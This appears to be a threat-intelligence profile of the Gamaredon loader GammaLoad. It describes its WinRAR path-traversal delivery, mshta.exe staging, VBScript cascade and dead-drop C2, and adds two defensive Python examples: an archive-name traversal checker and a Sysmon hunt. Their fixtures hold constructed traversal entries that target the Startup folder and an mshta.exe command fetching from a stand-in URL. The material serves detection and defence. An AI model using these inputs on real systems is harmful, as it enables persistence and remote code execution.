GammaLoad
GammaLoad is a Gamaredon/BlueAlpha-associated staging and loader malware family, most commonly described in recent reporting as an intermediate VBScript downloader within the group’s modular “Gamma” ecosystem. It is used after initial access to fingerprint infected hosts, update registry-based network configuration via dead-drop resolvers, and retrieve and execute arbitrary VBScript payloads from command-and-control infrastructure. Reporting describes GammaLoad as operating through multiple VBScript loaders in a four-stage cascade. It has been observed delivering additional Gamaredon malware including GammaWorm, a worm-like propagation component, and GammaSteel, a modular information stealer; some reporting also notes potential delivery of GammaWipe/GamaWiper.
High-confidence infection chains link GammaLoad to Gamaredon campaigns targeting Ukrainian entities, especially government, military, and critical infrastructure organizations. In the 2025-2026 activity documented by Sekoia, initial access used weaponized XHTML spearphishing lures and a malicious RAR archive exploiting the WinRAR path traversal vulnerability CVE-2025-8088. The archive dropped an HTA file into the Windows Startup folder, which mshta.exe executed to fetch GammaLoad from a remote URL. The broader ecosystem resolved dead drops and C2 in layers through services including Telegram, Telegra.ph, graph.org, Teletype, and Cloudflare Workers. Separate reporting states that since at least October 2023 BlueAlpha has delivered custom VBScript GammaLoad for data exfiltration, credential theft, and persistent access, and that GammaDrop may write GammaLoad to disk and establish persistence. Older 2022 reporting also describes GammaLoad as a PowerShell info-stealer used by Gamaredon against Ukrainian entities, so the name has covered more than one implementation over time. Overall, public reporting consistently places GammaLoad in Russia-linked Gamaredon/BlueAlpha espionage operations focused on Ukraine.
Hunt this family in your stack
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
According to Sekoia, the attack consists of exploiting the bug CVE-2025-8088, a path traversal bug in WinRAR, to run an HTML App payload called GammaPhish, which is later used to get a VBScript payload from the C2 server.
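The WinRAR bug above belongs to a well-understood class: an archive entry whose name resolves outside the extraction directory, which is how a downloaded archive can plant an HTA in the Startup folder. The following is an added example, not code from Sekoia, WinRAR or this page, and it does not reproduce CVE-2025-8088; it shows the pre-extraction check an extractor or a file gateway should run over entry names. The treatment of alternate data stream suffixes is an assumption for the example (that an extractor honouring ADS names would trust them), and the listing is constructed.

```python
# Added example; not code from Sekoia, WinRAR or the Mallory page. It does not
# reproduce CVE-2025-8088. It shows the bug class the CVE belongs to (path
# traversal on archive extraction) and the check an extractor or a mail/file
# gateway should run over entry names before writing anything to disk.
import re

DRIVE_RE = re.compile(r"^[A-Za-z]:")
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)


def _escapes(path: str) -> bool:
    """True if a single Windows-style relative path climbs above its root."""
    normalized = path.replace("/", "\\")
    if normalized.startswith("\\") or DRIVE_RE.match(normalized):
        return True  # absolute or UNC path: never acceptable from an archive
    depth = 0
    for part in normalized.split("\\"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:
                return True  # ".." climbed above the extraction root
        else:
            depth += 1
    return False


def escapes_destination(entry_name: str) -> bool:
    """True if extracting entry_name could write outside the destination.

    Both separators are honoured, absolute paths and drive letters are
    rejected, and a name carrying an NTFS alternate data stream suffix
    ("file:stream") has the stream name checked as a path of its own.
    (Assumption for this example: stream names may reach the filesystem.)
    """
    head, sep, stream = entry_name.partition(":")
    if sep and len(head) != 1:          # "C:..." is a drive, not an ADS
        return _escapes(head) or _escapes(stream)
    return _escapes(entry_name)


def targets_startup(entry_name: str) -> bool:
    """True if the entry would land in a per-user or all-users Startup folder."""
    return bool(STARTUP_RE.search(entry_name.replace("/", "\\")))


def unsafe_entries(entry_names):
    """Return the entries that must not be extracted, in listing order."""
    return [n for n in entry_names if escapes_destination(n)]


# Constructed listing, not from a real sample.
SAMPLE_LISTING = [
    "invoice.pdf",
    "docs/readme.txt",
    "a/b/../c.txt",
    "../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.hta",
    "notes.txt:..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\u.hta",
    "C:\\Windows\\Temp\\x.vbs",
]

if __name__ == "__main__":
    for name in unsafe_entries(SAMPLE_LISTING):
        flag = " (Startup folder)" if targets_startup(name) else ""
        print(f"REFUSE {name}{flag}")
```

The check is deliberately done on the entry name before extraction rather than by inspecting files afterwards: by the time a file sits in the Startup folder the persistence is already in place. A "../" that stays inside the tree (`a/b/../c.txt`) is allowed, which keeps the rule from rejecting legitimately built archives.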
Groups observed using it
3 distinct threat actors attributed by public researchers.
That URL fetches GammaLoad, the intermediate staging layer... “GammaLoad (Staging): We recovered multiple VBScript loaders from the compromised hosts. It seems that these loaders operate in a continuous cascade, with four distinct execution stages observed during our analysis.”
Since at least October 2023 BlueAlpha has delivered the custom VBScript malware GammaLoad, enabling data exfiltration, credential theft, and persistent access to compromised networks.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents mimicking Ukrainian institutions to target government entities.
Execution
5 techniques
resulting in the execution of arbitrary code retrieved from a command-and-control (C2) server
Following the download of the XML file onto victim networks, the attackers executed a PowerShell stealer.
We recovered multiple VBScript loaders from the compromised hosts. It seems that these loaders operate in a continuous cascade, with four distinct execution stages observed during our analysis.
Then the attackers used mshta.exe to download an XML file, which was likely masquerading as an HTML application file.
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Persistence
1 technique
Stealth
3 techniques
BlueAlpha uses obfuscation techniques, namely extensive amounts of junk code and random variable names to complicate analysis.
Then the attackers used mshta.exe to download an XML file, which was likely masquerading as an HTML application file.
Upon execution, the HTA file leverages mshta.exe to call a remote payload hosted on a C2 server.
Defense Impairment
1 technique
Credential Access
1 technique
Since at least October 2023 BlueAlpha has delivered the custom VBScript malware GammaLoad, enabling data exfiltration, credential theft, and persistent access to compromised networks.
Discovery
1 technique
Their primary objectives are to fingerprint the host system, update the network configuration in the registry using Dead Drop Resolvers (DDRs), fetch and execute arbitrary VBScript payloads from the C2 servers.
Command and Control
5 techniques
GammaLoad: a custom loader capable of beaconing to its C2 and executing additional malware
Their primary objectives are to fingerprint the host system, update the network configuration in the registry using Dead Drop Resolvers (DDRs), fetch and execute arbitrary VBScript payloads from the C2 servers.
If the C2 returns HTTP 200, it executes arbitrary VBScript from the response body.
DNS fast-fluxing complicates efforts to track and disrupt command-and-control (C2) communications.
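The Execution, Stealth and Command and Control entries above describe one observable chain: an HTA launched from the Startup folder by mshta.exe, mshta.exe calling a remote URL, VBScript loaders running in a cascade, and dead-drop lookups to public services. The following is an added example, not code from Sekoia or this page, that encodes those observations as a hunt over constructed Sysmon-style process-creation (event 1) and DNS-query (event 22) records. The dead-drop domain list is an assumption drawn from the services named in the reporting, and the events and URL are made up.

```python
# Added example; not code from Sekoia or the Mallory page. A small hunt over
# constructed Sysmon-style events (event 1 process creation, event 22 DNS
# query) encoding the chain described above: an HTA in the Startup folder run
# by mshta.exe, mshta.exe calling a remote URL, script hosts spawned in a
# cascade, and a script host resolving a dead-drop service. The domain list is
# an assumed mapping of the services named in the reporting; events are made up.
import re
from collections import defaultdict

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
DDR_DOMAINS = ("t.me", "telegram.org", "telegra.ph", "graph.org",
               "teletype.in", "workers.dev")  # assumption: services -> domains


def _image(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _is_ddr(query: str) -> bool:
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in DDR_DOMAINS)


def classify_process(ev: dict) -> list:
    """Findings for one process-creation event (Sysmon event 1 field names)."""
    image, parent, cmd = _image(ev["Image"]), _image(ev["ParentImage"]), ev["CommandLine"]
    findings = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta_remote_payload")        # HTA fetching from a URL
    if image in SCRIPT_HOSTS and STARTUP_RE.search(cmd):
        findings.append("script_from_startup_folder")  # persistence via Startup
    if image in SCRIPT_HOSTS and parent in SCRIPT_HOSTS:
        findings.append("script_host_cascade")         # one stage spawning the next
    return findings


def classify_dns(ev: dict) -> list:
    """Findings for one DNS-query event (Sysmon event 22 field names)."""
    if _image(ev["Image"]) in SCRIPT_HOSTS and _is_ddr(ev["QueryName"]):
        return ["script_host_ddr_lookup"]
    return []


def hunt(events) -> dict:
    """Map each host to the sorted set of findings raised against it."""
    per_host = defaultdict(set)
    for ev in events:
        hits = classify_process(ev) if ev["EventID"] == 1 else classify_dns(ev)
        per_host[ev["Computer"]].update(hits)
    return {h: sorted(f) for h, f in per_host.items() if f}


STARTUP = "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
SAMPLE_EVENTS = [  # constructed telemetry, not real IOCs
    {"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": f'"C:\\Windows\\System32\\mshta.exe" "{STARTUP}\\update.hta"'},
    {"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/p/stage1"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe //e:vbscript C:\\Users\\u\\AppData\\Local\\Temp\\s2.vbs"},
    {"EventID": 22, "Computer": "WS01", "Image": "C:\\Windows\\System32\\wscript.exe",
     "QueryName": "telegra.ph"},
    {"EventID": 1, "Computer": "WS02", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe \\\\fs01\\netlogon\\logon.vbs"},  # benign logon script
    {"EventID": 22, "Computer": "WS02", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "QueryName": "t.me"},  # a browser visiting Telegram is not a script-host lookup
]

if __name__ == "__main__":
    for host, findings in hunt(SAMPLE_EVENTS).items():
        print(host, ", ".join(findings))
```

Each rule on its own is noisy in a fleet (logon scripts run under wscript.exe, and Telegram is a normal browser destination), which is why the DNS rule is gated on the querying image and why `hunt` aggregates per host: a machine that trips several of these within one session is worth a look, a single hit usually is not. The "HTTP 200 then execute the body" behaviour quoted above is not visible in process or DNS telemetry; catching that needs proxy or script-block logging.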
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
Intermediate staging layer composed of VBScript loaders that fingerprint the host, update network configuration in the registry using dead drop resolvers, and fetch and execute arbitrary VBScript payloads from C2 servers.
A loader in the infection chain that is likely deployed by GammaPhish and used to deliver other Gamaredon malware families such as GammaSteel, and possibly GammaWorm or GammaWipe.
An intermediate VBScript downloader in the Gamaredon infection chain that fingerprints the host, updates network configuration in the registry using dead drop resolvers, and fetches and executes arbitrary VBScript payloads from C2 servers.
A staging or loader component in Gamaredon's Gamma ecosystem used as part of the modular intrusion chain.